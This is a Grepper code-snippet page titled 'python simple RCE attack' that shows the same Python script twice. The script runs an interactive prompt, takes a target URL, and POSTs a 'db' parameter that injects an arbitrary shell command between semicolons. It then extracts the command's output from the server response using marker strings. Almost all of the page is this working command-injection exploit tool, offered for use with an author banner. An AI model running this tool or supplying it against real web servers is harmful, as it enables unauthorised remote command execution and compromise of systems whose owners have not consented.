python simple RCE attack

Panicky Peacock answered on November 2, 2022 Popularity 1/10 Helpfulness 1/10

answer python simple RCE attack

python simple RCE attack

Comment

Tip Panicky Peacock 1 GREPCC

import requests
import re
from cmd import Cmd

class Terminal(Cmd):
    print("""
    ____/\\\\\\\\\____________/\\\\\\\\\__/\\\\\\\\\\\\\\\_______________/\\\\\\\________/\\\\\\\________/\\\\\\\____        
 __/\\\///////\\\_______/\\\////////__\/\\\///////////_____________/\\\//////\\\___/\\\//////\\\___/\\\//////\\\__       
  _\/\\\_____\/\\\_____/\\\/___________\/\\\_______________________\///_____\//\\\_\///_____\//\\\_\///_____\//\\\_      
   _\/\\\\\\\\\\\/_____/\\\_____________\/\\\\\\\\\\\_________________________/\\\____________/\\\____________/\\\__     
    _\/\\\//////\\\____\/\\\_____________\/\\\///////_______________________/\\\\/__________/\\\\/__________/\\\\/___    
     _\/\\\____\//\\\___\//\\\____________\/\\\_____________________________/\\\/___________/\\\/___________/\\\/_____   
      _\/\\\_____\//\\\___\///\\\__________\/\\\____________________________\///____________\///____________\///_______  
       _\/\\\______\//\\\____\////\\\\\\\\\_\/\\\\\\\\\\\\\\\_________________/\\\____________/\\\____________/\\\______ 
        _\///________\///________\/////////__\///////////////_________________\///____________\///____________\///_______



  ____        _         _                                     _ _       
 |  _ \      | |       | |                     /\            | (_)      
 | |_) | __ _| |_ _   _| |__   __ _ _ __      /  \  _   _  __| |_ _ __  
 |  _ < / _` | __| | | | '_ \ / _` | '_ \    / /\ \| | | |/ _` | | '_ \ 
 | |_) | (_| | |_| |_| | | | | (_| | | | |  / ____ \ |_| | (_| | | | | |
 |____/ \__,_|\__|\__,_|_| |_|\__,_|_| |_| /_/    \_\__, |\__,_|_|_| |_|
                                                     __/ |              
                                                    |___/               

It is a python script that you can do your RCE experiments quickly. Developed by Batuhan AYDIN.

https://github.com/batuhanaydn
    """)
    prompt = "Inject => "
    def default(self, args):
        output = RunCmd(args)
        print(output)

def RunCmd(cmd):
    domain = input("Attack_to =>")
    if ("http://" in domain or "https://" in domain) and domain != None:
        data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
        r = requests.post(domain, data=data)
        page = r.text
        m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
        if m:
            return m.group(1)
        else:
            return "Mission failed try something else or make sure you're in the right place :)"
    else:
        print("Bro please don't forget http:// or https://")

term = Terminal()
term.cmdloop()

xxxxxxxxxx

import requests

import re

from cmd import Cmd

class Terminal(Cmd):

    print("""

    ____/\\\\\\\\\____________/\\\\\\\\\__/\\\\\\\\\\\\\\\_______________/\\\\\\\________/\\\\\\\________/\\\\\\\____

 __/\\\///////\\\_______/\\\////////__\/\\\///////////_____________/\\\//////\\\___/\\\//////\\\___/\\\//////\\\__

  _\/\\\_____\/\\\_____/\\\/___________\/\\\_______________________\///_____\//\\\_\///_____\//\\\_\///_____\//\\\_

   _\/\\\\\\\\\\\/_____/\\\_____________\/\\\\\\\\\\\_________________________/\\\____________/\\\____________/\\\__

    _\/\\\//////\\\____\/\\\_____________\/\\\///////_______________________/\\\\/__________/\\\\/__________/\\\\/___

     _\/\\\____\//\\\___\//\\\____________\/\\\_____________________________/\\\/___________/\\\/___________/\\\/_____

      _\/\\\_____\//\\\___\///\\\__________\/\\\____________________________\///____________\///____________\///_______

       _\/\\\______\//\\\____\////\\\\\\\\\_\/\\\\\\\\\\\\\\\_________________/\\\____________/\\\____________/\\\______

        _\///________\///________\/////////__\///////////////_________________\///____________\///____________\///_______

  ____        _         _                                     _ _

 |  _ \      | |       | |                     /\            | (_)

 | |_) | __ _| |_ _   _| |__   __ _ _ __      /  \  _   _  __| |_ _ __

 |  _ < / _` | __| | | | '_ \ / _` | '_ \    / /\ \| | | |/ _` | | '_ \

 | |_) | (_| | |_| |_| | | | | (_| | | | |  / ____ \ |_| | (_| | | | | |

 |____/ \__,_|\__|\__,_|_| |_|\__,_|_| |_| /_/    \_\__, |\__,_|_|_| |_|

                                                     __/ |

                                                    |___/

It is a python script that you can do your RCE experiments quickly. Developed by Batuhan AYDIN.

https://github.com/batuhanaydn

    """)

    prompt = "Inject => "

    def default(self, args):

        output = RunCmd(args)

        print(output)

def RunCmd(cmd):

    domain = input("Attack_to =>")

    if ("http://" in domain or "https://" in domain) and domain != None:

        data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }

        r = requests.post(domain, data=data)

        page = r.text

        m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)

        if m:

            return m.group(1)

        else:

            return "Mission failed try something else or make sure you're in the right place :)"

    else:

        print("Bro please don't forget http:// or https://")

term = Terminal()

term.cmdloop()

Popularity 1/10 Helpfulness 1/10 Language python

Source: Grepper

Tags: python

Link to this answer
Share Copy Link

Contributed on Nov 02 2022

Panicky Peacock

0 Answers Avg Quality 2/10

python simple RCE attack

Contents

More Related Answers

python simple RCE attack

Grepper

Documentation

Social

Legal

Contact

Oops, You will need to install Grepper and log-in to perform this action.